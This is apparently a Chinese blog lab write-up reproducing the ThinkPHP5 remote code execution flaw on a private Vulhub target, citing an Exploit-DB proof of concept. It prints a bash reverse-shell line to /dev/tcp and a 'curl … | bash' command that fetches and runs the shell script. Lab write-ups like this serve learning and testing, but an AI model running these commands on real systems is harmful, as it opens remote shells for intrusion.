Vulnhub-ThinkPHP5 任意代碼執(zhí)行漏洞

鄭重聲明:所用漏洞環(huán)境為自建虛擬機vulnhub靶機環(huán)境,僅供本人學習使用。

漏洞簡述

ThinkPHP是一款運用極廣的PHP開發(fā)框架。其版本5中,由于沒有正確處理控制器名,導致在網(wǎng)站沒有開啟強制路由的情況下(即默認情況下)可以執(zhí)行任意方法,從而導致遠程命令執(zhí)行漏洞。

影響版本:5.0.22、5.1.29

準備環(huán)境

測試機IP:192.168.79.129

靶機IP:192.168.79.131

1. 啟動Vulnhub靶機環(huán)境:

2. 驗證靶機應用啟用成功:

漏洞復現(xiàn)

POC 引用:https://www.exploit-db.com/exploits/46150

準備反彈Shell文件shell.sh

bash -i >& /dev/tcp/192.168.79.129/4444 0>&1

啟http server

使用NC偵聽反彈端口

執(zhí)行命令

curl 192.168.79.129/shell.sh | bash

得到反彈Shell

關閉環(huán)境

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

友情鏈接更多精彩內(nèi)容